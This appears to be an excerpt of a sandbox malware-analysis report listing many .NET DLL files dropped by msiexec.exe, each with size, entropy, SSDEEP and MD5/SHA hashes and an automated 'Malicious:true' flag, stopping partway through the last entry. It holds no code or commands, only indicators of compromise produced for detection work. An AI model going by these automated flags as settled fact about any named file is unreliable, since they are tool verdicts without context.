                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1245448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.769261315323123
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:cxvknPxKYMVXllgnURGXuYl9wCi1Io+bZr:MvaPxKYcX8nURGX0CiY
                                                                                                                                                                                                                                                                                                                                  MD5:97F73DE2693B5F6EF780513E9179DDCF
                                                                                                                                                                                                                                                                                                                                  SHA1:EC998FAE441D1761960E1A1937EEADF60AE2ACC0
                                                                                                                                                                                                                                                                                                                                  SHA-256:92F5BAC23616A987292E4D65AABC8F16D102BAF50C1785A41C38305BC99A20B7
                                                                                                                                                                                                                                                                                                                                  SHA-512:98CE22DC95F50DA11F9828C9777DEF21AAB1EF95FAC938388766E2989C134F72896C7C8E1F686CF45077096879CFFD277CF94A7DBCECA238FD9BA0169DE8A14D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.587142355138018
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:p9SphH3cLeq/YxWmH6K9QdWoYA6VFHRN7hYcTR9z67V:pkHMLH/oEFClbV9zMV
                                                                                                                                                                                                                                                                                                                                  MD5:E807A9DF3752B47DD2EBF325488329EB
                                                                                                                                                                                                                                                                                                                                  SHA1:D780B123892ED5343BD2F0741184AE2F90A0A3A7
                                                                                                                                                                                                                                                                                                                                  SHA-256:BB902FB88A2C3AFD4548AA7631E6CEFFB9A8062A213B9654DE40D7C2ACB2A985
                                                                                                                                                                                                                                                                                                                                  SHA-512:6CB85784EA617D879BC5C40D204A91092F233A492C2EEA642E56ABDEA671066E5D0ABF29FBF1C074DFEBBE1683FBBE0A632F20952DBE82B0557EA40BE89B469A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):26376
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.566822188548986
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:TWhPTpWvZWnjmMDQnqyXhHuo0XWjYA6VFHRN7KW+ONSR9zdVHJ3:eVjm5n5XdCIFCl7BNe9zh3
                                                                                                                                                                                                                                                                                                                                  MD5:1F61CBDDE703B882F07EF7D71C3D3D25
                                                                                                                                                                                                                                                                                                                                  SHA1:F09B9EC89343C7EBACCA3C956859F46A30BCE04D
                                                                                                                                                                                                                                                                                                                                  SHA-256:B64A75F89C611F4CF88EC9AE85BB34D719578B01C106B16E2E8703694ABD1B0C
                                                                                                                                                                                                                                                                                                                                  SHA-512:78A90230E462F2AFE911E88E974FA7976D957DEFD3FF04C9B141D970AE25F29BE3F70C1D4ACFEE43C319FA80A142663B66EC3CE073EDB8AC99616720CDD0BB96
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):87824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.609888713325627
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:61Qcxml5haPYOueQFjym3sykEomWxGsVico5Bkbxliw33zC:61QIml5wPY3Fjy5ykE8xGsVicCBsXp3O
                                                                                                                                                                                                                                                                                                                                  MD5:EA5EF3E9C8F7A2A240ADB2D2D225AC01
                                                                                                                                                                                                                                                                                                                                  SHA1:EF69C741CF3CE92CC5B68E825C9E9796BAA9246B
                                                                                                                                                                                                                                                                                                                                  SHA-256:8609E30FBDE9BFE93B51A31E27963C44195EAC284904F5EA19E435E81CC9293D
                                                                                                                                                                                                                                                                                                                                  SHA-512:98C6B84FCB38F35E281265B7DD046A1CDFC1A31F787A011FE8227478C7D7C38AEBB09D350BAD457A115555BE28B7A6FD78659AC5A26AAF8A5B7970C25B19260D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15624
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.801530918765
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:W2NrDaW+p7WMYA6VFHRN7+eASR9zdVCOkh:nQbFClSe9za5
                                                                                                                                                                                                                                                                                                                                  MD5:23D709F84FAE16898B3B3FB532E39B92
                                                                                                                                                                                                                                                                                                                                  SHA1:34D3D72D6B1A2F0842DC18332585C60707CF29C2
                                                                                                                                                                                                                                                                                                                                  SHA-256:FBCB30E92AF2A28FC42F5862BBAC27A938B1A3BBDD21523DE48E5FC693AF720A
                                                                                                                                                                                                                                                                                                                                  SHA-512:0AAA8A9E4C2A7D7E287A1EC76F637BE582670E55823D42E179EDE70405BB60A58664F90CE2F39E1A5E136010E428E19DBBC38F61E7753F95CA5EDEB2FB5E883C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.782221204196243
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:WR0yWYi2W8pWjA6Kr4PFHnhWgN7agWykfKUSIX01k9z3ARqzJDL/:RyWYi2W8YA6VFHRN7C2IR9zooH/
                                                                                                                                                                                                                                                                                                                                  MD5:4089E1C839BC40FB1412C37BE8A6C3FE
                                                                                                                                                                                                                                                                                                                                  SHA1:5CCC3643FE29E5DD454ADC2E7127FE22D3982983
                                                                                                                                                                                                                                                                                                                                  SHA-256:4481BE9159BBA109BF872B6A7FD176CFA55416D4A8A666CCA60251B848AF7E54
                                                                                                                                                                                                                                                                                                                                  SHA-512:17BB639068C9DDCDD49380400E3829F82AF414C68FB53A68F4640B8FFF491F14ED35CD3F89A1030873D84BACE6558FF2F2099F5EF5598F7E1C58D6ECEDD8466F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):247080
Entropy (8bit):6.849191153993673
Encrypted:false
SSDEEP:6144:GsS/IAVyNU2kbEf5+i6MKORygikbyO2DGJ0pebVq:GsBAr2vt6MikbD2CieVq
MD5:E17BE481647C2DDCFFCD74FF9FBC1A74
SHA1:7A5E9AA77CD0C8C72BA81311934BFFC3AECE2342
SHA-256:086E14D805EF4CEFDB25506736DCC5D6E800D618DF672358CB1112BA04A1F8CA
SHA-512:3C2342D9B1DE3E7E191A543F1C1D47ED04A679400F79A77B9F044E93425864603F453CBA86929173E5B14EBEEB929B3729DF1F902B5E655A8DC716F316174C74
Malicious:true
Reputation:unknown

Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):666288
Entropy (8bit):6.78661325216844
Encrypted:false
SSDEEP:12288:W36Xx8oDIB+7QBj0YBC6WXz66M4cRuco/oMy5iu:W3EWIX5at
MD5:1B93945C7F04740122C60D8C9221654A
SHA1:D19F777B688704693BDE7C8B0456D8D82D8B3AB4
SHA-256:0C23E0E757D0DBF213A6BBFF8A76336D0AE762547EE898FA6F03F4C1A11C63C7
SHA-512:23319E803AB3A271812FE3BFBBA76EDF33D8F13C446CABA164BE1E68C0645B4D119818644642F15A02C266FE65090688D3734CB8BFD0A61D81B5136E77C1AC88
Malicious:true
Reputation:unknown

Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):101144
Entropy (8bit):6.476048974487395
Encrypted:false
SSDEEP:3072:vfgNzmjhqPdxPhjxSd+XBQCvePLDrnsrpyi3:3Nhq0FsE4
MD5:67FFDB95AB55A741D15CCCD4C7B75DBA
SHA1:D73B4BFBF850A3184990976B959CF08F925FBD08
SHA-256:1F8D33569B15DB329B49388E6DC03A9121739F2F4155901761A56CF66CFA2477
SHA-512:744E2409DFDBF41B4E1A568B0323FBEDB3F08368C812664CF7B7CF0F4FA269C7641CCC3BDC82075B97494829CF29D08E928BCE8AB4290B312EB6AB7CB8249758
Malicious:true
Reputation:unknown

Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):95496
Entropy (8bit):6.534791453724649
Encrypted:false
SSDEEP:1536:jWfjc8LAhPvoiTCxaDVvkDTC5O7/LyY204yhpVeypoi8C4dezFc:j0QsAZNBsDTs+zyY204yhpVey6dIO
MD5:2BB568CF400E0890E8AA25DA5445D3FF
SHA1:15C9D61A4EEFA521E7FD3FD51DF60AF80486FFED
SHA-256:49577AAE05031B386CB8C04275047ECE9A0D63A6C4BBDFB1A4AE3B7841761CE3
SHA-512:C2616137D3D41CF9F1A3F89F4F891C7DB09C18332CE5367C433C868E38DC9AF34D7A5D29D6023464F4250DB5EB1124319ED2A04BE2CEE9371391C7C498D8992A
Malicious:true
Reputation:unknown

Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):264992
Entropy (8bit):6.761266470511353
Encrypted:false
SSDEEP:6144:30bzt+JuwscekH2KrzQ5t056pAje2l3qZ7CLzG:35JuwDvHQNW27CLy
MD5:ECAF66EE198849D3200E028C0A31CE8B
SHA1:521E58557861EC5E549BFE9836E6E54C55E7F38A
SHA-256:193A45006B2330E29C5FC6D0D3F92C269D9E9BDF1FA141E51B0A07909B7A02E8
SHA-512:A5A73B4D1C6D3E346FC7DC85CD1E77181F2946FE99F0181B7BE68B98D8319718A07D4707DD3F709778175D3FDE73915B9AFED8FC451210D93CC596C8DF6CD8F8
Malicious:true
Reputation:unknown

Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):187192
Entropy (8bit):6.462092532995058
Encrypted:false
SSDEEP:3072:l7PmpgPixtBuguLv7F8IbGumTG5D5/vbF6V+F7LWYkQ6v+P0:FepnxeB1QG5lF7qtQ6v+M
MD5:39FAEB8118FD29C6205C0A2129E91454
SHA1:560A13F6BCAFB43B40F51770E6E2268AA2B37B4D
SHA-256:8146999337103583BB15FFD1D5DA680D6FE35F594A5AE49EDCFF5A16BD8B7B74
SHA-512:2631B643253CA643CDA19B9E3AEE72131EC5EAC4B7B81821DC45EA57B2A4CD23420A7808D979E90A609BE3D338BBC278F986E801001D92DC342FDF92ECC12F0D
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17672
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.642694010569177
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:m8imyfJe9eGXx44sAcUUWudXWwYA6VFHRN7T2lNbZR9zah6:m8j+nxTFClTsFT9zn
                                                                                                                                                                                                                                                                                                                                  MD5:399D1C1EE94247E9EF6500A017A71C1B
                                                                                                                                                                                                                                                                                                                                  SHA1:822F0321519EB59D625175CBF1A655F2F7699A9A
                                                                                                                                                                                                                                                                                                                                  SHA-256:D6693E0D5F2F24774E991A351F97D740E75A73FAD20295C4E2DDD51D9B65B6BE
                                                                                                                                                                                                                                                                                                                                  SHA-512:F577118238FC96FDACFE23CA6D37AA736CAD858022E20E65D881C7D06648D2D4EBD5E80E8F5B398E95A8F1DCE4B653022D71371AD9C75E514F687DA7359CD6A1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):38672
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.487371211774158
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:2IzyrkRPK1c3I484t6gu2FClLsl9zal7pQ:2IzBP8c3z6guiiLs3zarQ
                                                                                                                                                                                                                                                                                                                                  MD5:F81A8E96C4B41133CE2FBA56D63F4C22
                                                                                                                                                                                                                                                                                                                                  SHA1:85849958E58BF6A9FD5BEFDB67FF98842E6466B0
                                                                                                                                                                                                                                                                                                                                  SHA-256:77367BEF47DE9D2DEF9C606906A84D733A1D688BCF7299956828FB54C6A36422
                                                                                                                                                                                                                                                                                                                                  SHA-512:65102174EDF155614F696E1A251A2DD6A69176B61211EC5194067FE203D6B73D91D6A8E6E9D63188DD8A76BAB051E7EB77BEF00D7C569A798E53CD9BF20B1A27
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):75424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.41974698596593
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:P2sgnMIPQZQmsB2q+mKl/Q3mb1yF0YDC2oKQ15hC9QQs2mDLFClKmoQ9zRhoy:OsgXcmKmWYFlC2oKQsi3iKmVzRh
                                                                                                                                                                                                                                                                                                                                  MD5:596B37F463658FD24CE29F3F25C6628A
                                                                                                                                                                                                                                                                                                                                  SHA1:BE186A42FF6EE13C7F2546C3A7CAA622B4829FA7
                                                                                                                                                                                                                                                                                                                                  SHA-256:9B05AF160EFFCE0A352E0FB722350221A1F2A41010EFF10E769C12C3C28ABF10
                                                                                                                                                                                                                                                                                                                                  SHA-512:B03607DB59376501B6AFF0A0D04FA49B4CD106D9E009D5CBA006C6909A04BAD74FEAACAD0FE40704DA34D1D6AFD34F26D97C8B1090E4B6A177F52CEB5ADD4D54
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):747280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.696052130941475
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:Yq+dHPXqf5N+iMMturyUV8mIEUGKea0RAh5RNFRSll++KzUmw/BndUMHz6ifKjFW:yv+N+iMMturyU+m6RNFZUmw/BnfT6KK0
                                                                                                                                                                                                                                                                                                                                  MD5:97D87D45E05EAC86E89F33FFB66DD9CC
                                                                                                                                                                                                                                                                                                                                  SHA1:3B29D3210B4A1ABC1D2876599F776950E56C3451
                                                                                                                                                                                                                                                                                                                                  SHA-256:52BE87AB0CD386C0BE9538E44B9D1432BCF28370E98D568CBDAB409C84EC1889
                                                                                                                                                                                                                                                                                                                                  SHA-512:94834AD8ABB9F99E779D1DBF15502CA918B8D89ED83027CBDE5B7C8C15CBAF325286F4C127396E725F4490881D247EC411FD23E6D71C1B1C60A2C83366C18F06
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18696
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.596746437040324
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:LW4X1Wove+Scpij+uCozWEdYA6VFHRN7QHWMR9z2QgW:/RScci4FCl8Z9zzgW
                                                                                                                                                                                                                                                                                                                                  MD5:0C8FF2C70D84FB0202750D8A19E0EC20
                                                                                                                                                                                                                                                                                                                                  SHA1:0BCE9D795D182291948DA212B728CA3476D58F58
                                                                                                                                                                                                                                                                                                                                  SHA-256:651C26058CD4C530458E740923E4CA85F76EEF6FE9E915631678800E9AD7E862
                                                                                                                                                                                                                                                                                                                                  SHA-512:872D7DB41EA2941B9305C6702A18F32E8C3F9EB363E239CA2851D5F9EF7B724BD0D6B034FDEA07419A08CC30B7F8F667F2924E25180126F5CE747EB93C7987EE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):19744
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.575603714433907
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:aXoWX0yXQB1uXTSv/fvNRvGZYdf3zyP/weZvEydDgWvfNWZUX6HRN799R9zrJRri:1niZvVCcWF9ze
                                                                                                                                                                                                                                                                                                                                  MD5:A559E0096F62D213A900AAF749F08F5D
                                                                                                                                                                                                                                                                                                                                  SHA1:31C37CAAF3F0FA6C6ECE9E3C98E905FFF921AF1C
                                                                                                                                                                                                                                                                                                                                  SHA-256:7B5BD709929BE586FA1B95B7066C3A4AD9B5462FB1F7714BB39E6DDFD3B54148
                                                                                                                                                                                                                                                                                                                                  SHA-512:B9803794E42E984BA841D5A32BE8553FEB9CABED2E59866B35E73D3AF3641FA9D60207F98254BA923F9B9AA902BF08941B545F19310B4596CD097B01F22FBB7B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):156936
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5995271738923975
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:h3J/DYsIem43AYT+a5TfaEPvbKwUJmOaYIEipy50K:X/DyWqaFCGmdIcIEbb
                                                                                                                                                                                                                                                                                                                                  MD5:7710279322A362C928BF36639EFFBF81
                                                                                                                                                                                                                                                                                                                                  SHA1:2B679CA3058DC2A5C90F40D3C1A98C9553098AAC
                                                                                                                                                                                                                                                                                                                                  SHA-256:1842EFE9037300ECE2E81E40EC000FA9338A4C786CBCFED0B47DD05B1C4E77EB
                                                                                                                                                                                                                                                                                                                                  SHA-512:085C7342AECA9F65B9E3774BF2E84AC9D703D66F764678ABC79A1AB8D5F82BE59B50BA97B53303956F2DEB055553B419E91DE8002E8D219FB38AD933EC802ADD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):24336
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.299107673471786
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:/sIbPFWOUSnPEW51b04H9DGMq/tE8aQjryAkxkBm4U1zXtrC1IIKrWXi2WUYA6VJ:/vPFWOUSnP751b04H9DGMq/tE8aQjryz
                                                                                                                                                                                                                                                                                                                                  MD5:9354C7BD9F23D4899200DAAA3BE37296
                                                                                                                                                                                                                                                                                                                                  SHA1:440D5E15680AB4BCCDD656E598A12C8884A56390
                                                                                                                                                                                                                                                                                                                                  SHA-256:25D934AB5109749874D2FC86A356DB68DF98DE7F1A5857E3F2B8744173B1B8D5
                                                                                                                                                                                                                                                                                                                                  SHA-512:3549F0275E7C848EB7E3E3EB7B881C846F73D3F8448C3F5032E10A49A245D7310D3643B6A605A55DA88CC90F3DC6F132A26812A763580B0B36A81B8CC4AC3932
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2983584
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.807191200324224
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:TyNlk2vtvXwQdjfbPQ+EPba92I7aE0Vnv1XgVi4nNmch7cDpBsKTzkt2BeE:T+VdLX3Sv
                                                                                                                                                                                                                                                                                                                                  MD5:E6421C7A5CF51CB5B5706BF00AA01B4F
                                                                                                                                                                                                                                                                                                                                  SHA1:12876E56B267E945FB709D9B5703009872D1A4F7
                                                                                                                                                                                                                                                                                                                                  SHA-256:272042F39223A4445CCCAAE2490C8291CBA723A1C30B61DB7603C218C69216E1
                                                                                                                                                                                                                                                                                                                                  SHA-512:B8597038DEFDD8BC8ED07BF56903E7E85D4B427973C473F60920EE53AB04CBFD7BCA488AFC5B659116BFA62A3B95769A690496A34B95647DA1F1E65E13217E6D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16152
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.668996319122586
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:ulguSZJRWaJ7WzX6HRN7nVXC4deR9zVjxMY:TuWQWnVXC4dC9zVjd
                                                                                                                                                                                                                                                                                                                                  MD5:3E2A4F4D06E78AE1F2972A92F475C059
                                                                                                                                                                                                                                                                                                                                  SHA1:7ED79074D8F081398FA9119D20F475EF2A162814
                                                                                                                                                                                                                                                                                                                                  SHA-256:5B509E7AB8FC8FA00C722ABFDDDB37C1BDE182270D9A3030B785751910F3DFB3
                                                                                                                                                                                                                                                                                                                                  SHA-512:9DB1D000C9C5F130BEBF73EB8144495467A3D87165F6C94DBED18D4E709ACDBC787DC42AFA13D859EF70D441F3BDAD9979D96AA356439CBAA4BB8362E7F58ABF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25864
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.25146842792214
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:aBaJC9XmGP2SoxDZQj/6YWiXFW5YA6VFHRN7JKdpR9z+pttXEv:awsXmJDZQ7EFCluD9zWjXe
                                                                                                                                                                                                                                                                                                                                  MD5:457D34A9E93C95B0E0927741C43C706F
                                                                                                                                                                                                                                                                                                                                  SHA1:56C5AE9397D703F211CBF109CFC86EA5AE16DFCB
                                                                                                                                                                                                                                                                                                                                  SHA-256:434C2AEAEC2DED6A904FF16256412128FC0FA57DC6B54A1626E8F4558A14646B
                                                                                                                                                                                                                                                                                                                                  SHA-512:DD8759ED49410BB0086638A9101DF294D4A67C56ACC4509B26FC6DC136FE8A194E76747261218EED92E5DCB47365FD91262D1D8D38CA6F47B2B4BACD82E811CF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16152
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.794991722289914
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:9WxAgNW6i2Wp/X6HRN7AtIJVXC4deR9zVjxX:98m1WQgVXC4dC9zVjF
                                                                                                                                                                                                                                                                                                                                  MD5:E815C8AE914EE40BF8D404FCA79D5753
                                                                                                                                                                                                                                                                                                                                  SHA1:1E754EEC56B0762A99640B3B5537CB6F1FA81AE7
                                                                                                                                                                                                                                                                                                                                  SHA-256:89E4C33A4B7BA60A748A9EA3D5D1413AF0AB63CD29117F159FDCEF5779BD9359
                                                                                                                                                                                                                                                                                                                                  SHA-512:654D7B3AEFA8C29002247DB18807DF777421C94FC8E6ED4C8C013EC5828F142581DE45D2A1132C8D6BE7A2DEEEE2ED0F60F19EC78B94905245E3E5A52D23A67D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.771179430350626
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:k1b2xx+3kW2SmWypWjA6Kr4PFHnhWgN7agW5IhHssDX01k9z3AGWPsU:5o0W2SmWyYA6VFHRN7gIFDR9z7WP1
                                                                                                                                                                                                                                                                                                                                  MD5:CB70708DCDFC6E40B8D57703AC186C6B
